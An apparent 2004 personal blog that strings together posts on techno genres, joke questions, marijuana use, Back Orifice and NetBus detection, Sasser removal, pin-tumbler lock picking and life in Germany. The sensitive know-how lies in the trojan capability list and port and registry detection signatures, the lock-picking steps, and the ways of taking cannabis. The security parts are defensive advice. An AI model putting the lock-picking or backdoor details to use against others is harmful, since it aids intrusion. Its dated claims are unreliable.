- House: (also Chicago or Acid House): Like techno or rave, house is itself a term that is often applied to the whole scene, but for raver it is also a subgenre. For most raver, house is the blackest, most funky and hiphop like of techno styles. House most clearly shows the roots of techno in the joining of black and gay musics(haha, no offense but i hate house)... house is happier, more party like and more upbeat than the often pessimistic hardcore. It features lots of piano sounds and samples from rap and a very smooth flow to it. Good example of house include Adamski and Dee-Lite. MTV also finds that house music is the easiest to create music videos for.

- Trance: (also hardtrance) Trance is real popular in Indonesia, especially Padang, Europe, especially in Belgium and Germany. You find a lot more string sounds in trance, which often also uses a good deal more of the spoken word. Trance is, of course, supposed to put you in another state of mind, and the features the most mind expanding rhythms. The pulse of the song is supposed to be timed so as to mesh most effectively with the rhythms of the body and the bloodflows of the brain. Good example of trance include Ministry of Sound, Eden Transmission, 808 State, and Cabaret Voltaire.

- Ambient : Ambient is the most atmospheric and spacey(is it how to spell it?) or aural kind of techno music. There's a heavy use of echo and replay to create a comfort feeling on the listener. Ambient shows clear roots in New Age music, as well as the synth sounds of groups like Human League or electronic music pioneers like Brian Eno or Philip Glass. Ambient is supposed to be more alive than straight techno, more likely to make you want to meditate than dance. For this reason ambient is often featured in the chill out rooms at techno clubs where people go to rest between dancing. It's supposed to ease the mind, calm the body, and pamper the emotions into a reflective state. Some of the big names in ambient are the Psychick Warriors ov Gaia and Aphex Twin.

- Dub (also Breakbeat, Jungle, or Darkside): Dub techno shows Caribbean music to be a strong influence, example reggae, ska, and zouk. Dub uses some of the rhythms of reggae but sped up a great deal since reggae is usually played at a fairly slow tempo. Dub occasionally features sampled acoustic drumming (imagine that!!!) and uses a lot of original vocals, and has what a lot of people call a spooky feel to it. Some people even hear a little bit of gospel or spiritual in dub. Good example include Phuture Assassins and DHD (Dub House Disco.)

- Tribal : Tribal techno most often imitates (but rarely copies wholesale) Third World sounds and Fourth World musics (you know what third and fourth world is right? in case you don't know, it means some very traditional countries or not modern at all.), combining them with electronic sounds to create a modern primitive sound. Rather than sampling a particular ethnic sound, like a lot of so called World Music, tribal techno will simply borrow the feeling of Middle Eastern or Native American rhythms... tribal is supposed to sound the most ritualistic of all the kinds of techno. Tribal techno often tries to create an ethnotechno feeling which sounds primitive but can be hard to associate with any known Fourth World tribe or group, although some often does sample outright the chants or rituals of such groups. Examples of the tribal style I can find are Mere Mortals and Juno Reactor.

- Progressive (aka Deep House, Acid Jazz): Progressive techno of course is different from progressive music. For techno philes, progressive, which is real popular in San Francisco, features a more complex melody and layering of instrumentation, mixing chord progressions, and a spooky kind of feel. Acid Jazz in particular shows a sort of renewed interest with instrument lines oten jumping out and coming to dominate the tune. Good examples of progressive are Brother Love and React 2 Rhythm.

So have you decide which music type do you want? Well I strongly recommend you to try Trance and Jungle. They are the best. But don't ever ever try to go to a party after hitting EXTACY. Man I am sure in the next morning your necks won't be able to move like usual. Lots of beats will make u headbang every now and then. Approximately 120 beats per minute or more. Do you think your neck is strong enough to support your head banging for 8-12 straight hours? Good luck...

Can you provide me the answers for these questions???

Why is the blackboard green?
Why do they call it a black light when it's really purple?
Why do hotdogs come in packs of 8 when hotdog rolls come in packs of 10?
What do you call male ballerinas?
How come the sun makes your skin darker but your hair lighter?
If you dig a tunnel straight through the earth, will you come out with your feet first?
Why are pennies bigger than dimes?
Did they have antiques in the olden days?
Are zebras black with white stripes, or white with black stripes?
If Pringles are "so good that once you pop, you can't stop" why do they come with a resealable lid?
Is a sleeping bag a nap sack?
What came first, the fruit or the color orange?
Where does the white go when the snow melts?
Can blind people see their dreams?
If there's an exception to every rule, is there an exception to that rule?
Why do you click on start to exit Microsoft Windows?
Have you ever wondered why Trix are only for kids?
Why doesn't Tarzan have a beard?
Why do most cars have speedometers that go up to at least 130 when you legally can't go that fast on any road?
Why do they call it "getting your dog fixed" if afterwards it doesn't work anymore?
If Wile Coyote had enough money for all that Acme crap, why didn't he just buy dinner?
If masochists like to torture themselves, wouldn't they do it best by not torturing themselves? and if so, aren't we all masochist?
why is it called lipstick when it always comes off?
If when people freak out they are said to be "having a cow", when cows freak out are they said to be "having a person?"
Aren't you tired of people asking you rhetorical questions and you don't know if they are rhetorical questions or not?
Why is a person that handles your money called a BROKER?
Why do we leave expensive cars in the driveway, when we keep worthless junk in the garage?
why do they have handicap parking spaces in front of they skating rings?
What happens if someone loses a lost and found box?
Why do they call it taking a dump? Shouldn't it be leaving a dump?
What if the hokey-pokey really is what it's all about?
Where in the nursery rhyme does it say humpty dumpty is an egg?
If quizzes are quizzical then what are tests?
Why do they sterilize needles for lethal injections?
Why do banks leave the door wide open but the pens chained to the counter?
What would happen if an Irresistible Force met an Immovable Object?
What's the difference between a wise man and a wise guy?
If Americans throw rice at weddings, do the Chinese throw hamburgers?
how can you chop down a tree and then chop it up?
How can you hear yourself think?
If corn oil is made from corn, and vegetable oil is made from vegetables, then what is baby oil made from?
Is a man full of wonder a wonderful man?
Is a hot car cool or is a cool car hot?
How come thaw and unthaw mean the same thing?
If The Flintstones were B.C. and before America, why did they have Flintstones Thanksgiving and Flintstones Christmas?
If a Man is talking in the forest and there is no woman there to hear him, is he still wrong?
Why is it that when a person tells you there's over a million stars in the universe you believe them, but if someone tells you there's wet paint somewhere, you have to touch it to make sure?
if you fed a bee nothing but oranges, would it start making marmalade?
Why is it you get a penny for your thoughts, but have to put in your two cents worth?
If electricity comes from electrons, does morality come from morons?
If the speed of movement is slower than the speed of light - how fast is a moving light?
why do you get on a bus and a train but get into a car?
Why is it good to be a Daddy's girl, but bad to be a Momma's boy?
How can something be new and improved? if it's new, what was it improving on?
Is Disney world the only people trap operated by a mouse?
Why did they name that underwear company fruit of the loom?
Why do grocery stores buy so many checkout line registers if they only keep 3 or 4 open?
why do the ABC song, Twinkle Twinkle Little Star, and Baa Baa Black Sheep all have the same tune?
Do illiterate people get the full effect of alphabet soup?
How does Santa get into a house that doesn't have a chimney?
If you get cheated by the better business bureau, who do you complain to?
If you're in hell, and are mad at someone, where do you tell them to go?
What would Geronimo say if he jumped out of an airplane?
What would Cheese say if they got their picture taken?
why are turds pinched off at the end?
I know you can be overwhelmed, and I know you can be underwhelmed, but can you just be whelmed?
If Barbie is so popular, then why do you have to buy her friends?
Why does Donald Duck wear a towel when he comes out of the shower, when he doesn't usually wear any pants?
If you take an oriental person and spin him around a few times, does he become disoriented?
How come overtones and undertones are the same thing?
What would you use to dilute water?
What should one call a male ladybird?
How can military troops be deployed if they have never been ployed to begin with?
If you lived in Siberia and you wronged the Russians government, where would they send you?
Why do they call it an asteroid when its outside the hemisphere but call it a hemorrhoid when its in your ass?
If a cow laughed real hard, would milk come out her nose?
Before they invented drawing boards, what did they go back to?
Aren't all generalizations false?
Can atheists get insurance for acts of God?
Do you need a silencer if you are going to shoot a mime?
Can I get arrested for running into a Fire House yelling Movie! Movie!?
Can you be a closet claustrophobic?
Could someone ever get addicted to counseling?
If so, how could you treat them?
Did Adam and Eve have navels?
Did the early settlers ever go on a camping trip?
Did you ever notice when you blow in a dog's face he gets mad at you?
But when you take him in a car, he sticks his head out the window!
Do fish get cramps after eating?
Do infants enjoy infancy as much as adults enjoy adultery?
Do Lipton employees take coffee breaks?
Do one legged ducks swim in circles?
Do Roman paramedics refer to IV's as 4's?
Does the little mermaid wear an algebra?
Does the Postmaster General need a stamp of approval?
Have you ever imagined a world with no hypothetical situations?
How can overlook and oversee be opposites, while quite a lot and quite a few are alike?
How can someone "draw a blank"?
How can the weather be hot as hell one day and cold as hell another?
How can there be "self help GROUPS"?
How come Superman could stop bullets with his chest, but always ducked when someone threw a gun at him?
How come you press harder on a remote control when you know the battery is dead?
How do they get a deer to cross at that yellow road sign?
How do you know when yogurt goes bad?
How do you know when you're out of invisible ink?
How does a shelf salesman keep his store from looking empty?
How does the guy who drives the snowplow get to work in the mornings?
How fast do you have to go to keep up with the sun so you're never in darkness?
How is it possible to have a civil war?
If a parsley farmer is sued, can they garnish his wages?
If a stealth bomber crashes in a forest, will it make a sound?
If a tree falls in the forest and no one is around to see it, do the other trees make fun of it?
If a tree fell on a mime in the forest, would he make a sound and would anyone care?
If a turtle doesn't have a shell, is he homeless or naked?
If a woman can be a meter maid, can a man be a meter butler?
If all the world is a stage, where is the audience sitting?
If an orange is orange, why isn't a lime called a green or a lemon called a yellow?
If God dropped acid, would he see people?
How many people thought of the Post-It note before it was invented but just didn't have anything to write it down on?

Wednesday, May 12, 2004

Some informations about Hemp, Weed, Shit or whatever you call it.

Hemp is a plant with an incredible history stretching back several thousand years. The recent history of hemp in the United States is a great story from a human sociological standpoint, so let's take a look at it and see why this plant is caught in a cross-fire.

When most people think of fibers for cloth, they think about things like cotton or wool. Cotton and wool are both nice, soft fibers from the start. You can comb them out, spin them and create thread. This thread is great for making cloth that is soft to the skin, but it is not very strong.

Hemp is a lot like flax, and flax is where linen comes from. In both hemp and flax, the fibers are in the stalk of the plant. The fibers are something like the threads you see in a celery stalk long, stringy and tough. To get at the fibers, you comb them out of the woody part of the dried stalk. The fibers tend to be coarser than cotton or wool, and they are very strong. This strength makes hemp a great fiber for ropes.

It is believed that the word "canvas" came from the word "cannabis." Sailcloth and canvas was made from hemp for a very long time!

The reason why hemp shows up in organic magazines and catalogs is because it is very friendly to the environment. For example, environmentally conscious people like these aspects of hemp:

Cotton raised in the U.S. requires millions of pounds of pesticides and fertilizers. It is a very intensive crop that takes a lot out of the land. Bugs like boll weevils love cotton and must be killed with insecticides. Hemp, on the other hand, is a weed. According to the World Book encyclopedia, "Fiber hemp can be sown simply by scattering the seed on the ground." You can grow hemp using much less fertilizer and pesticide.

Hemp fibers can be used in many different ways. With them you can make cloth, paper, cardboard, fiber board, etc. By using hemp for paper and construction materials, pressure is removed from forests. Hemp also grows much faster and more densely than trees do.
The problem with hemp is that the hemp plant is also known as the Cannabis plant, which is also known as the marijuana plant. The following is from Encyclopedia Britannica:
Hemp (species Cannabis sativa): plant of the family Cannabaceae and its fibre, one of the bast fibre group. The plant is also grown for its seed, which contains about 30 percent oil, and for the narcotic drugs marijuana and hashish derived from its leaves and blossoms.
This connection to marijuana is what makes hemp such a hot issue in the United States. There are varieties of fiber hemp that eliminate the drug component of the plant to a large degree, but the concern is that it would be very easy to hide drug plants in a crop of fiber plants. So at the moment, hemp production in the U.S. is stalled and is a source of continuous debate.

Cannabis sativa is perhaps the most recognizable plant in the world. Pictures of the ubiquitous green cannabis leaf show up in the news media, textbooks and drug-prevention literature, and the leaf's shape is made into jewelry, put on bumper stickers and clothing and spray-painted on walls. The leaves are arranged palmately, radiating from a common center like the fingers of a hand spreading apart. Although most people know what the cannabis plant looks like, they may know very little about its horticulture.

Cannabis sativa is believed to be a native plant of India, where it possibly originated in a region just north of the Himalayan mountains. It is a herbaceous annual that can grow to a height of between 4 to 5 meters. The plant has flowers that bloom from late-summer to mid-fall. Cannabis plants usually have one of two types of flowers, male or female, and some plants have both. Male flowers grow in elongated clusters along the leaves and turn yellow and die after blossoming. Female flowers grow in spike-like clusters and remain dark green for a month after blossoming, until the seed ripens. Hashish, which is more powerful than marijuana, is made from the resin of the cannabis flowers.

The most common way of using marijuana is smoking. Smoking is also the most expedient way to get it into the bloodstream. When the smoke from marijuana is inhaled, it goes directly to the lungs. Your lungs are lined with millions tiny air sacs where gas exchange occurs. These sacs have an enormous surface area, 90 times greater than that of your skin. So they make it easy for the compounds to enter the body. The smoke is absorbed by the lungs just seconds after inhaling.

You can also eat marijuana. In this case, the marijuana enters the stomach and the blood absorbs it there. The blood then carries it to the liver and the rest of the body. The stomach absorbs THC more slowly than the lungs. When marijuana is eaten, the levels of THC in the body are lower, but the effects last longer.

Marijuana users often describe the experience of smoking marijuana as initially relaxing and mellow, creating a feeling of haziness and light-headedness. The user's eyes may dilate, causing colors to appear more intense, and other senses may be enhanced. Later, feelings of a paranoia and panic may be felt by the user.

Research shows that marijuana is not physically addictive, but it can be psychologically addictive. It's not considered physically addictive because users show few or no withdrawal symptoms during cessation. Psychological dependence usually develops because a person's mind craves the high that it gets when using the drug. Although marijuana is known to have negative effects on the human body, there is a raging debate over the use of marijuana as a medical treatment. Some say that marijuana should be legalized for medical use because it has been known to suppress nausea, relieve eye pressure in glaucoma patients, decrease muscle spasms, stimulate appetite, stop convulsions and eliminate menstrual pain. Others claim that marijuana's negative effects outweigh its benefits. There are currently nine U.S. states that allow for the use of marijuana for medical purposes: Alaska, Arizona, California, Colorado, Hawaii, Maine, Nevada, Oregon and Washington.

Marijuana is readily available in almost every corner of the United States, according to the Department of Justice. It's found growing in homes, on farms, in the suburbs and in the city. Cannabis is frequently found growing on public land, often in remote locations to prevent observation and identification of the growers. In 1999, the U.S. Forest Service seized almost 1 million pounds (453,592 kg) of cannabis plants and processed marijuana in 35 states. Marijuana is also smuggled into the United States from Mexico, Cambodia and Thailand, among other countries.
There is a growing trend toward indoor cultivation of marijuana in the United States because of the DEA's efforts to curtail outdoor cultivation. Indoor growers cultivate cannabis in closets, fish tanks and elaborate greenhouses. Some growers have even built structures that look like real homes but lack interior walls, all to hide their marijuana-growing operations. In 1998, drug law enforcement authorities seized 2,616 indoor marijuana-growing operations.

Marijuana is the single most-used illicit drug in the United States. Despite being illegal, marijuana use rivals the popularity of browsing the Internet. In 1998, more than 76.5 million Americans logged onto the Internet, according to Computer Industry Almanac. In that same year, more than 71 million Americans over the age of 12 admitted that they have used marijuana at least once in their lifetime.

There are several ways in which people use marijuana, and the way in which it is used determines the amount of chemicals transferred into the body, according to the authors of "Buzzed." Here are the most common methods of use:

-Cigarette - Also called a joint, dried marijuana buds are rolled into a cigarette. Approximately 10 percent to 20 percent of the THC is transferred into the body when smoking a joint.
-Cigar - Some users slice open a cigar, remove the tobacco and refill it with marijuana. The marijuana-filled cigar is often called a blunt.
-Pipe - You've probably seen people smoke pipes of tobacco, but these pipes are also used to smoke marijuana. About 40 percent to 50 percent of the THC is transferred into the body when using a pipe.
-Bong - These are water pipes that typically have a long tube rising out of a bowl-shaped base. Water pipes trap the smoke until it's inhaled, raising the amount of THC taken in.
-Food - Marijuana is sometimes baked into foods, such as brownies, or brewed as tea.

With millions of users, marijuana use is not limited to one demographic group. It cuts across all racial and economic boundaries. However, marijuana use is highest among younger people. The prevalence of marijuana use in teenagers doubled from 1992 to 1999: One out of every 13 kids aged 12 to 17 were current users of marijuana in 1999. The 1998 National Center on Addiction and Substance Abuse indicates that marijuana is very easy to obtain. Half of all 13-year-olds said that they can find and purchase marijuana, according to the study. Of teens surveyed, 49 percent said that they had first tried marijuana at age 13 or younger.

There are hundreds of slang words that mean "marijuana" (some refer to specific types). Here are just a few:
-Airplane
-Astro turf
-Aunt Mary
-Black Bart
-Boom
-Bud
-Charge
-Chiba chiba
-Chunky
-Dagga
-Dinkie dow
-Endo
-Ganja
-Haircut
-Hay
-Mary Jane
-Matchbox
-Maui wauie
-Sezz
-Yellow submarine
-Zambi

Know anything about Trojan Horse???

If you think Trojan Horse is something from the new Brad Pitt's movie called Troy, you are close. They have a rather similar concept and function. But what I mean in this blog is that Trojan as in for taking over someone else's computer over the Internet.

Here I'll share some information I know about it. Maybe too little, but I think it's ok since I'm still a newbie in this Internet world. But first I want to let you all know that I have never experienced my computer taken over by someone else, so you may believe my blog or just take it as a useless information. It's your decision.

Now let's begin, I'll try to give some background information on two well-known Trojan Horses. The first one is called Back Orifice... the second one NetBus. Besides talking about what you can do against these two "viruses" (I'm not sure if virus is the correct word for BO or Netbus, but to keep this blog easy to read I'll use that word) the question remains what other unknown viruses or Trojan Horses might be running on your system without you knowing? I'll give examples of detecting the Trojans, but these are for older versions of the trojans only. Currently there are so many versions of Back Orifice (BO2K) and NetBus (NetBus 1.2, 1.53, 1.60, 1.70, 2.0 Pro, 2.01 Pro ...) trojans. And, besides NetBus and Back Orifice there are many more trojans we will not mention in the rest of this document because it would simply become to difficult to read. A few of them are: Attack FTP Installer ; BackDoor ; DeepBO ; Executor ; FTP Trojan ; FTP99 ; Happy99 ; NetMonitor ; SubSeven etc.

Should you panic? Personally, I don't think so. I have been on the Internet quite some time now and there are some things you should just keep in mind and be careful. My motto is "better safe than sorry" so what I don't do is, for example, accept files from people on IRC. The first thing I do when I try some sort of new Internet application is to turn off all auto-accept options. I want to keep in control. I do not open email attachments I do not trust. Just to be sure I scan the email attachments I do trust first, before opening it.

As an example to what trojans can do on your system, here are a few of the capabities of Back Orifice 2000:

-Rebooting, locking up system, listing of passwords etc.
-View and edit the registry (create a key, set a value, get a value, delete a key, delete a value, rename a key, etc.)
-List directory, find file, delete file, view file, move file, rename file, copy file, make directory, remove directory and set file attributes.
-Display a message box.
-Logging keyboard activities, operations with log file: view, delete.
-Adding and removing network shares, mapping of shared devices, listing of active connections etc.
-Playing WAV files.

These are just a few things I do as a precaution. Who can you trust? That's hard to answer, maybe it doesn't even have to do with trust. Somebody you know might have a virus on his/hers system without him/her knowing it. When he or she uploads something to you, you might have it too. Another good example: I needed information about a problem with new hardware (from a well known brand) I bought for my PC. I searched for documentation on the hardware manufacturer's public FTP site and when opening a document (Word) from that FTP site I noticed it contained a macro virus. I discovered it on time, because I'm careful. That's probably the most important thing you can do against viruses.

Back to the two Trojan Horses Back Orifice and Netbus... they both run like a server on your system (a "back door" is opened on an infected PC to make access from outside possible), and with a client they can be accessed by other people, who can then do virtually anything on your system, including deleting files. As said before, once a system is infected, the one accessing your PC can do virtually anything, possibly even turning on your microphone and listen to what you are doing!

Some versions of the trojan horse report the IP address of a PC, once connected to the Internet, on an IRC channel. Other methods used are port scanners, which scan a range of IP addresses/ports to find a PC which has "the backdoor open". Not all versions of the trojan horses are accessible by anybody with a client, some are even "customized" with password protection, which means that if a system is infected, it can only be accessed by the person who has the password.

If you want to find out if you are infected by one or more trojans, what I recommend most is to search for information on trojans on the Internet at companies such as McAfee, Symantec and DataFellows. They usually have very good info about trojans and viruses.

I heard and read about a few methods on how you can possibly find out if you are "infected" by Back Orifice or Netbus. Note that these detection hints are for older versions of NetBus and Back Orifice only (not for example for Back Orifice 2000 or BO2K !). If you run these tests and don't find anything suspicious, this doesn't mean you are not infected. The following methods are just a few suggestions you can try, and do not guarantee anything. You should try the following methods at your own risk.

1. Netbus might be found with telnet. Open a dos box and type:
telnet 127.0.0.1 12345
telnet 127.0.0.1 12346

Telnet opens, and in case a line in your telnet window containing "netbus" (excluding "") you system is infected with Netbus.

2. For both Back Orifice (old version) and Netbus (old version) there is another possible way to find if you are infected with one of them. Close all your applications, especially those who point to network-shares. Open a DOS box and run the following command:
netstat -an|more

Back Orifice possibly replies with:

UDP 0.0.0.0:31337 *:*

NetBus possibly replies with:

TCP 0.0.0.0:12345 *:*
TCP 0.0.0.0:12346 *:*

Other "strange" replies from netstat, especially those with higher UDP and TCP ports, might be suspicious.

3. You can try looking in your system registry with regedit (recommended for advanced users only!) and take a look at:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices

This contains all files which are run as a service. If you find a service called .exe (yes, .exe, no name before the dot) or a service with a very very strange name which has a file size of about 122 Kb, then it's possible that you are infected with Back Orifice.

"Finding Your Back Orifice" is a site which shows screenshots of an infected system registry and a clean system registry.

4. If weird things start happening on your system, for example: missing files/directories, suddenly opening and closing CD-ROM drive etc. then it's possible your system is infected with Back Orifice or Netbus.

5. Back Orifice: Another method of finding out if your system is infected by BO (older version) is to search your WINDOWS/SYSTEM directory for the file windll.dll. If it's there you are possibly infected.

Rumors are that some Netbus/Back Orifice removal applications going around on the Internet are the trojan horses itself. For that reason you have to be very careful which removal application you are going to use.

What I recommend most, again, is to use a well-known brand virus scanner which can detect and remove viruses like Back Orifice and Netbus. Always check if this is the case before you buy, just to make sure! Another thing I can recommend is that you always keep your anti-virus software up-to-date. As an example: McAfee VirusScan has downloadable ".DAT" files which are renewed every month. PC Help is a site which also shows some methods how to remove Back Orifice from your system.

Below are a few applications which detect and/or remove Back Orifice and/or Netbus. (Use at your own risk... also be sure to read the complete instructions of the application before you use it).

-BackWork
-The Cleaner
-McAfee VirusScan
-F-Secure Anti-Virus for Windows

More applications and tools for detecting and/or destroying Trojan Horses can be found in the MPSmits.Com freeware & shareware area: Security: Anti Trojan Horse, Security: Anti-Virus Software, and for those of you who are looking for protection against winnukes visit Security: Anti Winnuke.

Some useful information about Sasser

Sasser starts 128 threads that scan randomly chosen IP addresses. Because this process is CPU intensive, your computer will experience performance degradation. In some instances, your computer may be too slow to use. An infected computer will also display LSA Shell errors.

You can also remove Sasser manually by following these steps.

1. Disconnect your computer from the Internet.
2. Boot in Safe Mode by pressing the F8 key during startup.
3. Navigate to your Windows directory (c:\WINDOWS or c:\WINNT) on your hard drive.
4. Look for a file named AVSERVE.EXE. Delete it.
5. Click on the Start menu and select Run.
6. Type "regedit" (without quotes).
7. Navigate to the following Registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
8. In the windows to the right, look for a value called avserve. Delete it.
9. Exit RegEdit.
10. Reboot.

If you do not have Sasser, or you just removed it from your system, you need to prevent future infection by installing the security update that fixes the LSASS vulnerability. The update is labeled 835732 and is available at Microsoft's Windows Update site.

Ever forget your house key and been locked outside?

I'll give you a simple method on how to get in without breaking anythin. The simple method which lots of times been use in movies.

In a normal deadbolt lock, a movable bolt or latch is embedded in the door so it can be extended out the side. This bolt is lined up with a notch in the frame. When you turn the lock, the bolt extends into the notch in the frame, so the door can't move. When you retract the bolt, the door moves freely.
A deadbolt lock's only job is to make it simple for someone with a key to move the bolt but difficult for someone without a key to move it.

Most deadbolts use a cylinder lock. In the cylinder lock, the key turns a cylinder, or plug, which turns an attached cam. When the plug is turned one way, the cam pulls in on the bolt and the door can open. When the plug turns the other way, the cam releases the bolt and the spring snaps it into place so the door cannot open. In a deadbolt lock, there is no spring mechanism the turning cylinder slides the bolt forward and backward. A deadbolt is more secure than a spring-driven latch since it's much harder to push the bolt in from the side of the door.
Inside a cylinder lock, there is a sort of puzzle, which only the correct key can solve. The main variation in lock designs is the nature of this puzzle. One of the most common puzzles and one of the easiest to pick is the pin-and-tumbler design.

The main components in the pin-and-tumbler design are a series of small pins of varying length. The pins are divided up into pairs. Each pair rests in a shaft running through the central cylinder plug and into the housing around the plug. Springs at the top of the shafts keep the pin pairs in position in the plug. When no key is inserted, the bottom pin in each pair is completely inside the plug, while the upper pin is halfway in the plug and halfway in the housing. The position of these upper pins keeps the plug from turning, the pins bind the plug to the housing.

When you insert a key, the series of notches in the key push the pin pairs up to different levels. The incorrect key will push the pins so that most of the top pins are still partly in the plug and partly in the housing. The correct key will push each pin pair up just enough so that the point where the two pins come together lines up perfectly with the space where the cylinder and the housing come together (this point is called the shear line). To put it another way, the key will push the pins up so that all of the upper pins are inserted completely in the housing, while all of the lower pins rest completely in the plug. Without any pins binding it to the housing, the plug moves freely, and you can push the bolt in and out. This simple puzzle design is very effective. Since the pins are hidden inside the lock, it's fairly difficult for most people to move the plug without the correct key. But, with a lot of practice, it is possible to solve the puzzle by other means.

There are two main elements involved in the picking process:

Picks - Picks are long, thin pieces of metal that curve up at the end (like a dentist's pick). They are used to reach into the lock and push the pins up
Tension wrench - Tension wrenches come in all shapes and sizes. Functionally, they aren't very complex. The simplest sort of tension wrench is a thin flathead screwdriver.

The first step in picking a lock is to insert the tension wrench into the keyhole and turn it in the same direction that you would turn the key. This turns the plug so that it is slightly offset from the housing around it.

While applying pressure on the plug, you insert a pick into the keyhole and begin lifting the pins. The object is to lift each pin pair up to the level at which the top pin moves completely into the housing, as if pushed by the correct key. When you do this while applying pressure with the tension wrench, you feel or hear a slight click when the pin falls into position. This is the sound of the upper pin falling into place on the ledge in the shaft. The ledge keeps the upper pin wedged in the housing, so it won't fall back down into the plug.

In this way, you move each pin pair into the correct position until all of the upper pins are pushed completely into the housing and all of the lower pins rest inside the plug. At this point, the plug rotates freely and you can open the lock.

Conceptually, the lock-picking process is quite simple, but it is a very difficult skill to master. Locksmiths have to learn exactly the right pressure to apply and what sounds to listen for. They also must hone their sense of touch to the point where they can feel the slight forces of the moving pins and plug. Additionally, they must learn to visualize all the pieces inside the lock. Successful lock picking depends on complete familiarity with the lock's design.

Nostradamus

When a momentous catastrophe occurs, people react in a variety of ways. One response is to seek out prophecies of the event -- inspired predictions that foretold its coming. These forecasts can be comforting because they suggest that the horrible incidents were inevitable, that they happened as part of a larger plan. Through the course of human history, there have been hundreds of notable prophets, but in the wake of modern tragedies, one name seems to pop up more than any other: Nostradamus. Nostradamus has been credited with prophesying dozens of pivotal episodes in recent history, including the rise of Adolf Hitler, the assassination of John F. Kennedy and, most recently, the destruction of the World Trade Center towers. On the Internet, Nostradamus followers and hoaxers alike have put together detailed interpretations of Nostradamus' works, as well as fabricated passages.

Germany

Currently I live in Germany. Working in this I.T. company called IBS. When I come to Germany with intention to work, I have so little knowledge about Germany. All I knew by asking people is that German people are very dependent, careless about someone else's business, only think about themselves. But they were wrong. German people (well at least those I know) are very nice, they are polite, full of manner, punctual, and many other good stuff. I like this place. But one think that I don't like is their heating system. I believe anywhere in Germany is the same, the heater will goes off every night automatically. Damn it's cold everytime I woke up at night to get rid of toxic in my body. And somehow my bathroom is even warmer than my room.